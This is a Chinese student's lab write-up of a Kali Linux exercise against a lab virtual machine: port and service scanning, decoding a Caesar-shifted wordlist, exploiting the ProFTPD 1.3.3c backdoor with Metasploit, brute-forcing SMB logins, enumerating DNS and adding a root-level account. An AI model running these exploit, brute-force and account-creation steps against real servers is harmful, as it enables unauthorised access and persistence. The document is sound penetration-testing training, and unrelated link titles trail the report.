kali实验过程与结果讲解
kali实验过程与结果讲解(学习)
前期准备:打开虚拟机,开启完毕后会显示服务器的ip
1、 收集此服务器的信息。
1) 开放的端口及服务
nmap 192.168.100.100
通过命令查看目标IP开放的端口和服务,从而获得端口信息和开放的服务信息
2) 此服务器主机名
Nmap -sV 192.168.100.100
-sV 探测端口服务版本并且可以查看该服务器的主机名
2. 本次考核为大家提供了所需的字典文件,但是进行了“位移为3”的恺撒密码(替换加密)加密;
请使用浏览器访问本服务器开放的web服务,下载加密的字典文件并进行解密。
通过Python编程解译出凯撒密码的位移3位的反推密码,然后进行解密制成TXT文本文件放入KALI等待爆破:
3. 使用metasploit对此服务器某服务后门漏洞进行利用,并获得最高权限
1)该存在后门漏洞的服务为proftpd后门漏洞
Nmap -sT -Pn -A 192.168.100.100
Seach ProFTPD
2) 漏洞利用与获得最高权限过程
通过对各个服务进行查询后门漏洞,最终发现proftpd_133c_backdoor的后门漏洞并进行利用攻击
Set payload cmd/unix/bind_perl选择攻击漏洞利用模块
Set rhost 192.168.100.100作为目标靶机的IP地址
Set lport 21为目标端口
Show options查看列出渗透攻击模块或模块的所有配置参数
Exploit进行渗透攻击
然后遇到500 Invalid command的报错,这时需要进行提权
HELP ACIDBITCHEZ
输入之后,成功渗透进入靶机 Shell输入后可以进入命令行,接着输入sudo -s切换到root用户界面,获得最高权限成功。
4:对此服务器某存在弱口令的服务进行密码爆破
1) 该存在弱口令的服务为smb
验证存在弱口令的服务为SMB,接着进行登录爆破
Use auxiliary/scanner/smb/smb_login
2)口令爆破过程
现在进行下一步的操作爆破
Set rhosts 192.168.100.100进行设置目标IP靶机
Set user_file /root/dic.txt设置用户名的TXT文本录入
Set pass_file /root/dic.txt设置用户密码的TXT文本录入
最后进行爆破run,等待爆破结果发现
success ——user:admin
就是成功爆破的用户名与密码
3)使用获得的密码登录该服务,并找出key文件
进入我的电脑,输入靶机IP:\192.168.100.100进入登录,并输入用户名与密码,查看到三个文件目录的opt,最后找到key文件存在。
5. 此服务器开放了dns服务器提供class.sec域名的解析,请进行信息收集
1)查询该域名的NS和MX记录
Dig @192.168.100.100 class.sec mx
Dig @192.168.100.100 class.sec ns
通过dig命令查询域名的NS和MX记录,
MX:邮件服务器资源记录,记录一个域的邮件服务器的域名
NS:名字服务器资源记录,记录一个域的权威域名服务器的域名
2) 使用工具对该域名解析进行穷举
Fierce -dnsserver 192.168.100.100 -dns class.sec
Fierce 工具主要是对子域名进行扫描和收集信息,使用fierce工具获得一个目标主机上所有IP地址和主机信息
6:使用上述漏洞利用得到的权限创建一个帐号,要求如下:
1) 以“学号+姓名首字母”命名
利用第三题的proftpd_133c_backdoor的后门漏洞再次进行渗透, 获取最高权限后的root进行漏洞利用
Useradd 666nmz用户名的命名为学号后三位+姓名首字母
Passwd 666nmz选择设置密码的用户,并设置密码
输出密码后,再次输出密码进行确认
2) uid为学号后3位
Usermod -u 666 666nmz
这行命令就是设置UID为学号后三位的命令,在root用户下进行设置后,su切换到666nmz用户,输入ID命令查看666nmz用户下的UID为666(666nmz)
7. 使用ssh登录该账户
1)登录成功后显示的信息
Ssh 666nmz@192.168.100.100
进行ssh服务登录,请求登录后会提示是否继续登录(yes or no),确定登录后需要输出密码,密码成功后完成。
2) 查看/etc/passwd文件
在ssh登录后的root用户下查看/etc/passwd文件
kali实验过程与结果讲解相关推荐
- 脑电实验注意事项及实验过程中伪迹识别
点击上面"脑机接口社区"关注我们 更多技术干货第一时间送达 Rose分享一篇群友 Tina关于脑电实验的学习笔记,感谢脑机社区群友Tina的分享. 实验前准备 1.填写被试信息及知 ...
- 数字电路实验怎么接线视频讲解_【高中物理】电学实验满分知识点总结及例题精讲...
电学实验最全知识点总结 一.实验的考查内容 (1)测定金属的电阻率(练习使用螺旋测微器): (2)描绘小灯泡的伏安特性曲线: (3)测定电源的电动势和内阻: (4)练习使用多用电表: (5)传感器的简 ...
- VirtualBox安装kali linux过程及安装后无法全屏问题解决方法(2)
VirtualBox安装kali linux过程及安装后无法全屏问题解决方法(2) 参考文章: (1)VirtualBox安装kali linux过程及安装后无法全屏问题解决方法(2) (2)http ...
- python实验过程心得体会_20192416 实验四《Python程序设计》综合实践报告
20192416 实验四 <Python程序设计> 综合实践报告 课程:<Python程序设计> 班级:1924 姓名:不愿透露姓名的はんたくさん 学号:20192416 实验 ...
- VRRP浮动路由(浮动路由原理,了解HSRP路由选举原理,实验过程与总结)
文章目录 前言 单一链路存在的问题 HSRP是思科的私有协议 HSRP (热备份路由选择协议)介绍 VRRP浮动路由原理 Master路由器选举原理 浮动路由原理 实验详解 实验目的 实验过程 主机设 ...
- tensorflow 实验过程可重复
在做科研时使用tensorflow作为算法开发工具.后来有了更好用的pytorch之后,由于很多基础代码都是用tensorflow编写的,所以,就没有转到pytorch上来. 最近在写论文,比较重视算 ...
- 相机标定实验过程注意问题及总结
相机标定实验过程注意问题及总结 1 标定板 用于标定的标定板制作的精度一定要高,精度低的误差会很大. 2 相机 在标定过程中相机调好后就不能再动了,稍微动一点也要重新标定. 3 清洁度检查 检查拍摄的 ...
- PLC实验 S7-300超详细硬件组态实验过程
PLC S7-300超详细硬件组态实验过程 实验要求: 1.组态s7-300站. 2.系统要求:CPU315-2DP,1个16点DI(数字量输入),一个16点DO(数字量输出),一个8点AI(模拟量输 ...
- zigbee抓包实验过程
今天做zigbee的抓包实验,结果发现不能实验过程跑不起来! 出现了错误: not able to setup connection to device smartRF04EB的错误:当时就懵了! 到 ...
最新文章
- 小程序云开发 一开通云开发,给数据库添加一条记录
- sbt配置nexus仓库
- 使用java的Calendar对象获得当前日期的上几个度开始、结束时间
- 台湾大学林轩田机器学习技法课程学习笔记5 -- Kernel Logistic Regression
- 文件处理_月隐学python第21课
- 需求 新建数据表用于演练查询 2128
- stc89c52开发板遥控器解码 红外线发射 内置 eeprom 存储 串口显示编码
- guido发布python版本的年份_Guido van Rossum
- CSS3——CSS行内元素和块级元素的转换
- dispatcherServlet流程图
- Hibernate配置文件,映射文件
- smartdrv.exe是什么(收藏)
- 特征探索性分析Exploring_features
- 《剑来》语句摘录(七)
- 如何缓解眼睛疲劳酸痛?
- 【存储】HDS VSP
- uniapp 使用pdf.js 加载本地pdf文件报错问题
- cublas 的学习笔记_1
- c++语言读取txt文件,C++中读写txt文件并分离字符的方法
- prototype原型练习 前端校招面试